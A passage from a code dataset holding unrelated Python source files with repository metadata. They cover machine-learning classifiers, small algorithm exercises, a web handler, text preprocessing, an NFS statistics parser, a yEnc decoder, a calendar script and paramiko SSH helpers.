X_train, X_test, y_train, y_test = X[train_index], X[test_index], y[train_index], y[test_index]\n start_time = time.time()\n clf = RandomForestClassifier(n_estimators=100, verbose=2)\n clf.fit(X_train, y_train)\n\n feature_importances = pd.DataFrame(clf.feature_importances_, index=columns,\n columns=['importance']).sort_values('importance', ascending=False)\n\n y_pred = clf.predict(X_test)\n rf_out = r\"{0}/{1}\".format(fp, i)\n make_dir(rf_out)\n generate_classification_report(rf_out, method_name, y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n run_time = calculate_time(start_time)\n save_feature_importances(feature_importances, rf_out)\n\n if save:\n save_metrics(rf_out, method_name, mapping, accuracy, run_time)\n save_model(clf, method_name, rf_out)\n i += 1\n\n\ndef support_vector_machine_classifier(data, fp, save=False, time_series=False):\n from sklearn import svm\n method_name = \"svm\"\n\n if time_series:\n for i, Xy in enumerate(split_time_series(data)):\n X_train, X_test, y_train, y_test, mapping = Xy\n logger.info(\"Support vector machine classifier -- TIME SERIES -- initialised\")\n start_time = time.time()\n clf = svm.LinearSVC(verbose=10)\n clf.fit(X_train, y_train)\n\n y_pred = clf.predict(X_test)\n generate_classification_report(fp, method_name, y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n 
run_time = calculate_time(start_time)\n\n if save:\n save_metrics(fp, method_name, mapping, accuracy, run_time)\n save_model(clf, method_name, fp)\n\n else:\n X, y, mapping, _ = split_data(data, normalise=True)\n # X_train, X_test, y_train, y_test = Xy\n\n cv = StratifiedKFold(n_splits=10, random_state=42, shuffle=False)\n i = 0\n for train_index, test_index in cv.split(X, y):\n X_train, X_test, y_train, y_test = X[train_index], X[test_index], y[train_index], y[test_index]\n\n logger.info(\"Support vector machine classifier -- initialised\")\n start_time = time.time()\n clf = svm.LinearSVC(verbose=2)\n clf.fit(X_train, y_train)\n svm_out = r\"{0}/{1}\".format(fp, i)\n make_dir(svm_out)\n y_pred = clf.predict(X_test)\n generate_classification_report(svm_out, method_name, y_test, y_pred, save)\n accuracy = metrics.accuracy_score(y_test, y_pred)\n run_time = calculate_time(start_time)\n\n if save:\n save_metrics(svm_out, method_name, mapping, accuracy, run_time)\n save_model(clf, method_name, svm_out)\n i += 1\n\n\nif __name__ == '__main__':\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.INFO)\n formatter = logging.Formatter(formatter)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-f\", \"--file-location\", help=\"location to files.\", default=\"../Datasets/cleaned\")\n parser.add_argument(\"-o\", \"--out\", help=\"out folder path\", default=\"out/\")\n\n args = parser.parse_args()\n make_dir(args.out)\n\n original_dataset = read_files([args.file_location], clean_data=False) # todo remove hardcode\n\n original_dataset = sort_time(original_dataset)\n support_vector_machine_classifier(original_dataset, fp=args.out, save=True, time_series=False)\n # random_forest_classifier(original_dataset,fp=args.out, save=True, time_series=False)\n","repo_name":"SusmitaDumiRai/Dissertation","sub_path":"Implementation/classifiers/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":10089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74044528785","text":"N =int(input().strip())\n#last 2 digits of a ibonacci repeat after 300 digits\nN = N%300\n\ndef fibonacci(n):\n table = [0,1]\n for i in range(2,n+1):\n table.append(table[-1]+table[-2])\n return table[n]\n\na = fibonacci(N)\n# last_digit = a%10\n# second_last = (a//10)%10\n\n# print(second_last*10+last_digit)\nprint(a%100)","repo_name":"Harshit-Raj-2000/Algorithms-and-Data-Structures","sub_path":"coding interview practice/puzzles/last2digitsofibonaci.py","file_name":"last2digitsofibonaci.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4115679727","text":"from google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\nimport bene_query\nimport bene_util\nimport os\nimport urllib\n\n\n\"\"\"\nConsumer home page\n\"\"\"\nclass ConsumerHomePage(webapp.RequestHandler):\n def get(self):\n user = users.get_current_user()\n if not user: # if not signed in\n self.redirect('/?signin=True')\n return\n if bene_query.getCurrentUser().isProducer: # producer can't get to consumer home page\n self.redirect('/')\n return\n \n _consumer = bene_query.getCurrentConsumer()\n if _consumer == None: # if consumer page doesn't exist, need to create one\n self.redirect('/createconsumer?%s' % urllib.urlencode({'redirect': 
'consumerhome', 'msg': True}))\n            return\n        \n        # if setup done, then show home page\n        template_values = bene_util.initTemplate(self.request.uri)\n        path = os.path.join(os.path.dirname(__file__), 'consumerhome.html')\n        self.response.out.write(template.render(path, template_values))\n        return\n    \n    '''\n    Exception handler\n    '''\n    def handle_exception(self, exception, debug_mode):\n        if debug_mode:\n            super(ConsumerHomePage, self).handle_exception(exception, debug_mode)\n        else:\n            template_values = bene_util.initTemplate(self.request.uri)\n            path = os.path.join(os.path.dirname(__file__), 'not_found.html')\n            self.response.out.write(template.render(path, template_values))\n        return\n    \n    ","repo_name":"faaez/BeneTag","sub_path":"consumer_home.py","file_name":"consumer_home.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"12057944992","text":"arr = [ 0, 1, 3 , 2 , 6 , 9 , 4]\n\ndef part(arr , l , h):\n    i = l - 1 \n    pivot = arr[h]\n    \n    for j in range(l , h):\n        if(arr[j] <= pivot):\n            i+=1\n            arr[i] , arr[j] = arr[j] , arr[i]\n    \n    arr[i+1] , arr[h] = arr[h],arr[i+1]\n    return (i+1)\n    \n    \ndef quick(arr , l , h):\n    if( l < h ):\n        pi = part(arr , l , h)\n        quick(arr , l , pi - 1)\n        quick(arr , pi + 1 , h)\n    return arr\n\nprint(quick(arr, 0, len(arr) - 1))\n","repo_name":"nir099/KnowledgeBase","sub_path":"Algo/Sort/Quick/quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"26372556722","text":"#Multiply of elements\n\nlst = []\n\nn = int(input(\"Enter number of elements : \"))\nfor i in range(0, n):\n    ele = int(input())\n    lst.append(ele)\nprint(\"--------LIST IS---------------\")\nprint(lst)\nprint(\"--------------------------------\")\n\nprint(\"-----------********---------------------\")\n\n\ndef multiplyList(lst):\n    # Multiply elements one by one\n    result = 1\n    for x in lst:\n        result = result * x\n    return result\n\ntotalmult = multiplyList(lst);\nprint('multiplication of elements using function: ', totalmult)\nprint(\"--------------------------------\")\nprint(\"-----------********---------------------\")\n\nclass Multiply_Ele:\n    def __init__(self,Multi):\n        self.lst = Multi\n    def pro_ele(self):\n        pro = 1\n        for n in self.lst:\n            pro = pro*n\n        print(\"Multiply of elements given a list using oops concept:\",pro)\n\nm = Multiply_Ele(lst)\nm.pro_ele()\nprint(\"-----------********---------------------\")","repo_name":"Rakeshkumarlenka/test_functions","sub_path":"DECEMBER/LIST/Q2.Mulitply .py","file_name":"Q2.Mulitply .py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29829276665","text":"import appscript\nfrom datetime import datetime\n\ndef add_to_calendar(title, details, start_time, end_time, calendar_name):\n    # Convert start_time and end_time to datetime objects\n    start_time = datetime.strptime(start_time, '%Y-%m-%d %H:%M')\n    end_time = datetime.strptime(end_time, '%Y-%m-%d %H:%M')\n\n    # Create a new event in the specified calendar\n    appscript.app(\"Calendar\").calendars[calendar_name].events.end.make(\n        new=appscript.k.event, \n        with_properties={\n            appscript.k.summary: title,\n            appscript.k.description: details,\n            appscript.k.start_date: start_time,\n            appscript.k.end_date: end_time\n        }\n    )\n\nif __name__ == \"__main__\":\n    # Import the k and app objects from appscript\n    # 
[appscript documentation](https://appscript.readthedocs.io/en/latest/)\n    # [k object documentation](https://appscript.readthedocs.io/en/latest/terminology/k.html)\n    # [app function documentation](https://appscript.readthedocs.io/en/latest/terminology/app.html)\n    k = appscript.k\n    app = appscript.app\n    \n    # Set the base date for the itinerary\n    base_date = \"2023-09-10\"\n    \n    # List of events in the itinerary\n    events = [\n        (\"Arrival at California Adventure\", \"Begin your magical journey.\", \"15:30\", \"16:00\"),\n        (\"Option A: Musical Celebration of Coco OR Option B: Dr. Strange: Mysteries of the Mystic Arts\", \"Attend the chosen show.\", \"16:00\", \"16:30\"),\n        (\"Avengers Assemble!\", \"Join the Avengers.\", \"16:40\", \"17:10\"),\n        (\"Meet Baymax in San Fransokyo Square\", \"Meet and greet session with Baymax.\", \"17:10\", \"17:30\"),\n        (\"Option A: Explore and Eat OR Option B: Guardians of the Galaxy: Awesome Dance Off!\", \"Choose one activity.\", \"17:30\", \"18:00\"),\n        (\"Mickey's Trick and Treat at Oogie Boogie Bash\", \"Attend the treat session.\", \"18:00\", \"18:30\"),\n        (\"Transition to Disneyland for Parade\", \"Head to Disneyland for the parade.\", \"18:30\", \"19:00\"),\n        (\"Magic Happens Parade\", \"Enjoy the parade.\", \"19:00\", \"20:00\"),\n        (\"Visit to Mickey's Toontown\", \"Explore the magical town.\", \"20:00\", \"20:30\"),\n        (\"Mickey & Minnie's Runaway Railway\", \"Experience the ride.\", \"20:30\", \"21:00\"),\n    ]\n    \n    # Add each event to the calendar\n    for event in events:\n        title, details, start, end = event\n        start_time = f\"{base_date} {start}\"\n        end_time = f\"{base_date} {end}\"\n        \n        # Add the event to the \"Thomas Family\" calendar\n        add_to_calendar(title, details, start_time, end_time, \"Thomas Family\")\n","repo_name":"thinkingserious/apple-calendar","sub_path":"trip.py","file_name":"trip.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7621949467","text":"#LAURA MAMBRILLA MORENO\n#EJ 3 CUADERNO 3\n\n\"\"\"\nEscribe un programa que lea la hora en notación de 24 horas y la devuelva en\nnotación de 12 horas (ejemplo: las 18:30 serán las 6:30 PM). Valida las entradas\npara asegurarte de que se trata de valores en el rango correcto.\n\n\"\"\"\n\ndef validar_entrada_hora ():\n    \"\"\"\n    OBJ: validar entrada y marcar rango para el formato hora\n    \"\"\"\n    hora=-1 #para que la hora entre en el bucle\n    while hora<0:\n        try:\n            hora= int(input('Hora: '))\n        except ValueError:\n            print ('Dato incompatible. Introduzca otra hora: ')\n    if 0 <= hora <= 23:\n        return hora\n    return 'Fuera del rango del formato \"horas\"'\n\ndef validar_entrada_minutos ():\n    \"\"\"\n    OBJ: validar entrada y marcar rango para el formato hora\n    \"\"\"\n    minutos=-1\n    while minutos<0:\n        try:\n            minutos= int(input('Minutos: '))\n        except ValueError:\n            print ('Dato incompatible. 
Introduzca otros minutos: ')\n    if 0 <= minutos <= 59:\n        return minutos\n    return 'Fuera del rango del formato \"horas\"'\n\ndef cambio_hora(hora):\n    \"\"\"\n    int --> None\n    OBJ: pasar de formato AM a PM\n    \"\"\"\n    if hora>12:\n        hora_pm = hora - 12\n        if minutos<10:\n            print (hora_pm,': 0',minutos,' PM')\n        else:\n            print (hora_pm,':',minutos,' PM')\n    else:\n        if minutos<10:\n            print (hora,': 0',minutos,' AM')\n        else:\n            print (hora,':',minutos,' AM')\n    \n\n#MAIN\n\nprint ('Introduzca una hora')\nhora= validar_entrada_hora()\nminutos= validar_entrada_minutos()\n\ncambio_hora(hora)\n    \n","repo_name":"lauram15a/Fundamentos_de_programacion","sub_path":"CUADERNOS DE TRABAJO/CUADERNO 3/ej 3 cuaderno 3 horas y minutos.py","file_name":"ej 3 cuaderno 3 horas y minutos.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13462133140","text":"## install these packages before running\n# !pip install -U spacy\n# !python -m spacy download en_core_web_sm\n\nimport pandas as pd\nimport re\nimport unicodedata\nimport nltk\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize.toktok import ToktokTokenizer\nfrom nltk.corpus import stopwords\nimport spacy\n\n\ndef basic_clean_keep_code(string):\n    '''\n    Takes in a string, makes all characters lowercase, normalizes all characters, and removes unnnecessary special characters\n    import re\n    import unicodedata\n    '''\n    # Remove line breaks\n    string = re.sub(r'\\n', ' ', string)\n    \n    # Remove the urls\n    string = re.sub(r'https?://[^\\s]+', '', string)\n    \n    # lowercase all words\n    lowered = string.lower()\n\n    # normalize unicode characters using lowered\n    normalized = unicodedata.normalize('NFKD', lowered).encode('ascii', 'ignore').decode('utf-8', 'ignore')\n    \n    # replacing unnecessary characters from normalized\n    cleaned = re.sub(r\"[^a-z0-9'\\s]\", '', normalized)\n    \n    return cleaned\n\ndef tokenize(string):\n    '''\n    Takes in a string and tokenizes the string\n    Modules:\n        from nltk.tokenize.toktok import ToktokTokenizer\n    '''\n    # initialize tokenizers\n    tokenizer = nltk.tokenize.ToktokTokenizer()\n    \n    # tokenize string and store in tokenized\n    tokenized = tokenizer.tokenize(string, return_str=True)\n    \n    return tokenized\n\n\ndef remove_stopwords(string, extra_words=[], exclude_words=[]):\n    '''\n    takes in a string and removes stopwords using the stopwords\n    Modules:\n        from nltk.corpus import stopwords\n    '''\n    # establish stop word list\n    stop_word_list = stopwords.words('english')\n    \n    # if there are any words in the kwarg\n    if bool(extra_words) == True:\n\n        # add them to the stop_word_list\n        stop_word_list = stop_word_list + extra_words\n\n    # if there are any words in the kwarg\n    if bool(exclude_words) == True:\n\n        # remove them from the stop word list\n        stop_word_list = [word for word in stop_word_list if word not in exclude_words]\n    \n    # getting a list of words from string argument that are not in the list of stop words (removing the stopwords)\n    filtered = [word for word in string.split() if word not in stop_word_list]\n    \n    # rejoin all the words in the lsit with a space to reform string\n    string_without_stopwords = ' '.join(filtered)\n    \n    # exit and return the string\n    return string_without_stopwords\n\ndef cleaned_with_code_included(x):\n    '''\n    Takes in a string literal and performs cleaning, tokenizing, and removes the stop words\n    \n    '''\n    # runs a basic clean\n    x = basic_clean_keep_code(x)\n    \n    # tokenizes the words\n    x = tokenize(x)\n    \n    # 
removes the stop words\n x = remove_stopwords(x)\n \n # returns string with all cleaning steps performed\n return x\n\ndef lemmatize(string):\n '''\n Takes in a string and returns it with all words in lemmatized form\n Modules:\n import nltk\n '''\n # initializing lematizing object\n wnl = nltk.stem.WordNetLemmatizer()\n\n # getting a list of root words from each word in the split string\n lemmas = [wnl.lemmatize(word) for word in string.split()]\n\n # rejoining the list of root words to form a lemmatized corpus\n lemmatized = ' '.join(lemmas)\n \n # exit and return lemmatized info\n return lemmatized\n\ndef spacy_string(string):\n '''\n Takes in a string and returns it with all words in spacy-lemmatization form form\n Modules:\n import spacy\n '''\n # initializing lematizing object\n nlp = spacy.load('en_core_web_sm')\n \n # getting lemmatized words\n string_stemmed = [word.lemma_ for word in nlp(string)]\n \n # rejoining words\n string_stemmed = ' '.join(string_stemmed)\n \n # exit and return lemmatized info\n return string_stemmed\n\ndef basic_prepare(df):\n '''\n Takes in a df and adds columns with cleaned code\n '''\n df.dropna(inplace=True)\n # initial cleaning completed\n df['basic_clean_with_code'] = df['readme_contents'].apply(lambda x: cleaned_with_code_included(x))\n \n # getting spacy stemming\n df['spacy'] = df['basic_clean_with_code'].apply(lambda x: spacy_string(x))\n \n # getting lemmatized text\n df['lem'] = df['basic_clean_with_code'].apply(lambda x: lemmatize(x))\n \n return df\n","repo_name":"garcia-moore/nlp-readme-project","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37706505815","text":"from procfs.core import ProcessFile, Dict\n\n\n# /proc/net/rpc/nfsd documentation:\n# /fs/nfsd/stats.c : nfsd_proc_show\n# /net/sunrpc/stats.c : svc_seq_show\n# /fs/nfsd/nfsproc.c : nfsd_procedures2\n# /fs/nfsd/nfs3proc.c : nfsd_procedures3\n# /fs/nfsd/nfs4proc.c : nfsd_procedures4 nfsd4_ops\n# http://marc.info/?l=linux-nfs&m=119308862812388&w=1\n# http://article.gmane.org/gmane.linux.nfs/16594\nclass _BaseNfs(ProcessFile):\n \"\"\"Base class for parsing /proc/net/rpc/nfs and /proc/net/rpc/nfsd\n \"\"\"\n\n def _parse(self, data):\n lines = data.splitlines()\n result = Dict()\n for line in lines:\n str_values = line.split()\n type_ = str_values.pop(0)\n values = []\n for value in str_values:\n if '.' 
in value:\n parser = float\n else:\n parser = int\n values.append(parser(value))\n parser_name = '_parse_%s' % type_\n if hasattr(self, parser_name):\n parser = getattr(self, parser_name)\n values = parser(*values)\n result[type_] = values\n return result\n\n def _parse_net(self, netcnt, netudpcnt, nettcpcnt, nettcpconn):\n return Dict(netcnt=netcnt, netudpcnt=netudpcnt,\n nettcpcnt=nettcpcnt, nettcpconn=nettcpconn)\n\n def _parse_proc2(self, cnt, null, getattr, setattr, root, lookup,\n readlink, read, writecache, write, create, remove,\n rename, link, symlink, mkdir, rmdir, readdir, statfs):\n return Dict(null=null, getattr=getattr, setattr=setattr,\n root=root, lookup=lookup, readlink=readlink,\n read=read, writecache=writecache, write=write,\n create=create, remove=remove, rename=rename,\n link=link, symlink=symlink, mkdir=mkdir,\n rmdir=rmdir, readdir=readdir, statfs=statfs)\n\n def _parse_proc3(self, cnt, null, getattr, setattr, lookup, access,\n readlink, read, write, create, mkdir, symlink, mknod,\n remove, rmdir, rename, link, readdir, readdirplus,\n fsstat, fsinfo, pathconf, commit):\n return Dict(null=null, getattr=getattr, setattr=setattr,\n lookup=lookup, access=access, readlink=readlink,\n read=read, write=write, create=create, mkdir=mkdir,\n symlink=symlink, mknod=mknod, remove=remove,\n rmdir=rmdir, rename=rename, link=link,\n readdir=readdir, readdirplus=readdirplus,\n fsstat=fsstat, fsinfo=fsinfo, pathconf=pathconf,\n commit=commit)\n\n\nclass nfsd(_BaseNfs):\n \"\"\"/proc/net/rpc/nfsd\n \"\"\"\n\n def _parse_rc(self, hits, misses, nocache):\n return Dict(hits=hits, misses=misses, nocache=nocache)\n\n def _parse_fh(self, stale, total_lookups, anonlookups, dir_not_in_cache,\n nondir_not_in_cache):\n return Dict(stale=stale, total_lookups=total_lookups,\n anonlookups=anonlookups,\n dir_not_in_cache=dir_not_in_cache,\n nondir_not_in_cache=nondir_not_in_cache)\n\n def _parse_io(self, read, written):\n return Dict(read=read, written=written)\n\n def _parse_th(self, threads, fullcnt, *busy_times):\n busy = {'10-20': busy_times[0],\n '20-30': busy_times[1],\n '30-40': busy_times[2],\n '40-50': busy_times[3],\n '50-60': busy_times[4],\n '60-70': busy_times[5],\n '70-80': busy_times[6],\n '80-90': busy_times[7],\n '90-100': busy_times[8]}\n return Dict(threads=threads, fullcnt=fullcnt, busy=busy)\n\n def _parse_rpc(self, cnt, badcnt, badfmt, badauth, badclnt):\n \"\"\"See /net/sunrpc/stats.c : svc_seq_show\n \"\"\"\n return Dict(cnt=cnt, badcnt=badcnt,\n badfmt=badfmt, badauth=badauth,\n badclnt=badclnt)\n\n def _parse_ra(self, cache_size, *depths):\n not_found = depths[-1]\n depth = {10: depths[0], 20: depths[1], 30: depths[2], 40: depths[3],\n 50: depths[4], 60: depths[5], 70: depths[6], 80: depths[7],\n 90: depths[8], 100: depths[9]}\n return Dict(cache_size=cache_size, depth=depth, not_found=not_found)\n\n def _parse_proc4(self, cnt, null, compound):\n return Dict(null=null, compound=compound)\n\n# def _parse_proc4ops(self, cnt, access, close, commit, create, delegreturn,\n# getattr, getfh, link, lock, lockt, locku, lookup,\n# lookupp, nverify, open, open_confirm, open_downgrade,\n# putfh, putpubfh, putrootfh, read, readdir, readlink,\n# remove, rename, renew, restorefh, savefh, secinfo,\n# setattr, setclientid, setclientid_confirm, verify,\n# write, release_lockowner, exchange_id, create_session,\n# destroy_session, sequence):\n# return Dict(access=access, close=close, commit=commit,\n# create=create, delegreturn=delegreturn,\n# getattr=getattr, getfh=getfh, link=link, 
lock=lock,\n# lockt=lockt, locku=locku, lookup=lookup,\n# lookupp=lookupp, nverify=nverify, open=open,\n# open_confirm=open_confirm,\n# open_downgrade=open_downgrade, putfh=putfh,\n# putpubfh=putpubfh, putrootfh=putrootfh, read=read,\n# readdir=readdir, readlink=readlink, remove=remove,\n# rename=rename, renew=renew, restorefh=restorefh,\n# savefh=savefh, secinfo=secinfo, setattr=setattr,\n# setclientid=setclientid,\n# setclientid_confirm=setclientid_confirm,\n# verify=verify, write=write,\n# release_lockowner=release_lockowner,\n# exchange_id=exchange_id,\n# create_session=create_session,\n# destroy_session=destroy_session, sequence=sequence)\n\n\nclass nfs(_BaseNfs):\n \"\"\"/proc/net/rpc/nfs\n \"\"\"\n\n def _parse_rpc(self, cnt, retrans, authrefresh):\n \"\"\"See /net/sunrpc/stats.c : rpc_proc_show\n \"\"\"\n return Dict(cnt=cnt, retrans=retrans, authrefresh=authrefresh)\n","repo_name":"pmuller/procfs","sub_path":"procfs/processes/net/rpc.py","file_name":"rpc.py","file_ext":"py","file_size_in_byte":6570,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"48"} +{"seq_id":"72324451027","text":"from shorthand import bitmask\nfrom contextlib import ExitStack, closing\nfrom shorthand import ceildiv\nfrom coropipe import PipeWriter\nimport re\nfrom io import BufferedIOBase\nfrom log import Progress\nfrom warnings import warn\n\nclass FileDecoder:\n def __init__(self, log, pipe):\n self.log = log\n self.pipe = pipe\n \n def parse_header(self):\n header = dict()\n # TODO: skip data until $=ybegin>; limit skipped data to say 1000 B\n # TODO flexible ordering; handle omission; flexible space; ignore lines\n # TODO: handle extra parameters\n # TODO: possibility to emit notices about unhandled parameters\n try:\n while True:\n stripped = self.pipe.buffer.lstrip(b\"\\r\\n\")\n if stripped:\n break\n self.pipe.buffer = yield\n self.pipe.buffer = stripped\n \n yield from self.pipe.expect(b\"=ybegin part=\")\n except EOFError:\n return None\n [header[\"part\"], _] = yield from self.pipe.read_delimited(b\" \",\n self.PART_DIGITS)\n header[\"part\"] = int(header[\"part\"]) - 1\n if (yield from self.pipe.consume_match(b\"total=\")):\n [header[\"total\"], _] = yield from self.pipe.read_delimited(\n b\" \", self.PART_DIGITS)\n header[\"total\"] = int(header[\"total\"])\n yield from self.pipe.consume_match(b\"line=128 \")\n yield from self.pipe.expect(b\"size=\")\n [header[\"size\"], _] = yield from self.pipe.read_delimited(b\" \",\n self.SIZE_DIGITS)\n header[\"size\"] = int(header[\"size\"])\n yield from self.pipe.consume_match(b\"line=128 \")\n \n yield from self.pipe.expect(b\"name=\")\n [header[\"name\"], _] = yield from self.pipe.read_delimited(b\"\\n\",\n self.NAME_CHARS)\n header[\"name\"] = header[\"name\"].rstrip()\n if (header[\"name\"].startswith(b'\"') and\n header[\"name\"].endswith(b'\"') and header[\"name\"] != b'\"'):\n header[\"name\"] = header[\"name\"][1:-1]\n header[\"name\"] = header[\"name\"].decode(\"ascii\")\n \n if (yield from self.pipe.consume_match(b\"=ypart begin=\")):\n [header[\"begin\"], _] = yield from self.pipe.read_delimited(b\" \",\n self.SIZE_DIGITS)\n header[\"begin\"] = int(header[\"begin\"]) - 1\n yield from self.pipe.expect(b\"end=\")\n [header[\"end\"], _] = yield from self.pipe.read_delimited(b\"\\n\",\n self.SIZE_DIGITS)\n header[\"end\"] = int(header[\"end\"])\n # TODO: make sure part size is not ridiculously huge\n return header\n \n def validate_header(self, header, chunking):\n # todo update params and compare\n \n 
size = header.get(\"size\")\n total = header.get(\"total\")\n if (size is not None and total is not None and\n ceildiv(size, chunking) != total):\n raise ValueError(header)\n \n [number, remainder] = divmod(header[\"begin\"], chunking)\n # TODO: compare number with part\n if total is not None and number >= total or remainder:\n raise ValueError(header[\"begin\"])\n if total is None:\n # TODO: part size <= chunking\n pass\n else:\n if number == total - 1:\n expected = size\n else:\n expected = header[\"begin\"] + chunking\n if expected not in (header[\"end\"], None):\n raise ValueError(header[\"end\"])\n \n def decode_part(self, file, header):\n # TODO: limit decoded data to (end - begin), or size if not partial, or some hard-coded limit if no size given\n file.seek(header[\"begin\"])\n # TODO: do not allow =y lines, newlines, etc to exceed data bytes by say 100\n progress = Progress(self.log, header[\"size\"], header[\"begin\"])\n with closing(StreamDecoder(UnclosingWriter(file))) as decoder:\n while True:\n data = self.pipe.buffer\n keywords = self.KEYWORD_LINE.search(data)\n if keywords:\n data = data[:keywords.start()]\n else:\n escape = self.HALF_ESCAPE.search(data)\n if escape:\n data = data[:escape.start()]\n decoder.feed(data)\n decoder.flush()\n if keywords:\n # TODO: ignore any unknown =y... lines\n self.pipe.buffer = self.pipe.buffer[keywords.end():]\n break\n if escape:\n while True:\n self.pipe.buffer = (yield).lstrip(b\"\\r\\n\")\n if self.pipe.buffer:\n break\n if self.pipe.buffer.startswith(b\"y\"):\n self.pipe.buffer = self.pipe.buffer[1:]\n break\n else:\n self.pipe.buffer = yield\n progress.update(file.tell())\n # TODO: incorporate into total of all files; update total of all files with real file size\n # TODO: keep samples over multiple parts\n if file.tell() != header[\"end\"]:\n raise ValueError(header[\"end\"])\n \n expected = \"end size={} part={} pcrc32=\"\n size = header[\"end\"] - header[\"begin\"]\n expected = expected.format(size, 1 + header[\"part\"])\n yield from self.pipe.expect(expected.encode(\"ascii\"))\n crc = decoder.getCrc32()\n [stated, delim] = yield from self.pipe.read_delimited(b\" \\r\\n\", 8)\n if int(stated, 16) != int(crc, 16):\n msg = \"Calculated part CRC {} != stated pcrc32={}\"\n raise ValueError(msg.format(crc, stated))\n \n if delim != b\"\\n\":\n yield from self.pipe.read_delimited(b\"\\n\", 30)\n \n # TODO: explicitly detect second yEnc object and report as error,\n # since this is specifically allowed\n \n PART_DIGITS = 10 # yEnc1-formal1.txt (2002) maximum is 999 (3 digits)\n SIZE_DIGITS = 30 # yEnc1-formal1.txt maximum is 2^62 - 1 (19 digits)\n NAME_CHARS = 1000 # yenc-draft.1.3.txt (2002) maximum is 256 characters\n \n KEYWORD_LINE = re.compile(br\"=[\\r\\n]*y\")\n HALF_ESCAPE = re.compile(br\"=[\\r\\n]*$\")\n\ntry:\n from yenc import Decoder as StreamDecoder\nexcept ImportError:\n from binascii import crc32\n \n class StreamDecoder:\n def __init__(self, file):\n self._file = file\n self._crc = 0\n self._pipe = PipeWriter()\n self._cleanup = ExitStack()\n coroutine = self._pipe.coroutine(self._receive())\n self._cleanup.enter_context(coroutine)\n \n def close(self):\n self._pipe.close()\n del self._pipe\n self._cleanup.close()\n \n def feed(self, data):\n self._pipe.write(data)\n \n def _receive(self):\n while True:\n data = self._pipe.buffer\n pos = data.find(b\"=\")\n if pos >= 0:\n data = data[:pos]\n data = data.replace(b\"\\r\", b\"\").replace(b\"\\n\", b\"\")\n data = data.translate(self.TABLE)\n # TODO: check data size 
overflow\n self._crc = crc32(data, self._crc)\n self._file.write(data)\n if pos >= 0: # Escape character (equals sign)\n self._pipe.buffer = self._pipe.buffer[pos + 1:]\n while True:\n byte = yield from self._pipe.read_one()\n if byte not in b\"\\r\\n\":\n break\n # TODO: check for size overflow\n [byte] = byte\n data = bytes(((byte - 64 - 42) & bitmask(8),))\n self._crc = crc32(data, self._crc)\n self._file.write(data)\n else:\n try:\n self._pipe.buffer = yield\n except EOFError:\n break\n \n def flush(self):\n pass\n \n def getCrc32(self):\n return format(self._crc, \"08x\")\n \n TABLE = bytes(range(256))\n TABLE = TABLE[-42:] + TABLE[:-42]\n\nclass UnclosingWriter(BufferedIOBase):\n def __init__(self, writer):\n self.writer = writer\n def write(self, *pos, **kw):\n return self.writer.write(*pos, **kw)\n","repo_name":"vadmium/usenet-downloader","sub_path":"yencread.py","file_name":"yencread.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"25329003582","text":"#Funcion que no regresa nada solo imprime\ndef decirHola(nombre=\"\"):\n print('Hola {0}'.format(nombre))\ndecirHola('Andres')\ndecirHola()\n\n#Funcion que me regresa un valor\ndef hacerSuma(num1,num2):\n total = num1 + num2\n return 'El resultado es: '+ str(total)+' '+ str( type(total)) \n\nnum1=input('Escribe numero 1: ')\nnum2=input('Escribe numero 2: ')\n\nprint(hacerSuma(num1,num2))\n\n#total= hacerSuma(2,3)\n","repo_name":"jorgeortiz123/CodigoPythonML","sub_path":"CodigoDePractica/CodigoPython/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44965355295","text":"#!/usr/bin/python\n\n# -*- coding: UTF-8 -*-\n\n\nimport paramiko\n\nfrom eve import app\n\nDEFAULT_USERNAME = app.config['DEFAULT_USER']\nDEFAULT_KEY_FILE = app.config['RSA_FILE']\n\n\ndef trans_data(hostname,\n key_file=DEFAULT_KEY_FILE,\n remote_path=None,\n local_path=None,\n port=22,\n username=DEFAULT_USERNAME ):\n\n with paramiko.Transport(hostname, port) as t:\n key = paramiko.RSAKey.from_private_key_file(key_file)\n t.connect(username=username, pkey=key)\n sftp = paramiko.SFTPClient.from_transport(t)\n sftp.put(localpath=local_path, remotepath=remote_path)\n\n\n\n\n\n\n\ndef command_with_result(hostname, command, key_file=DEFAULT_KEY_FILE, username=DEFAULT_USERNAME, port=22):\n with paramiko.SSHClient() as ssh:\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(hostname, port, username, key_filename=key_file)\n stdin, stdout, stderr = ssh.exec_command(command)\n return ''.join(stdout.readlines()), ''.join(stderr.readlines())\n\n\ndef 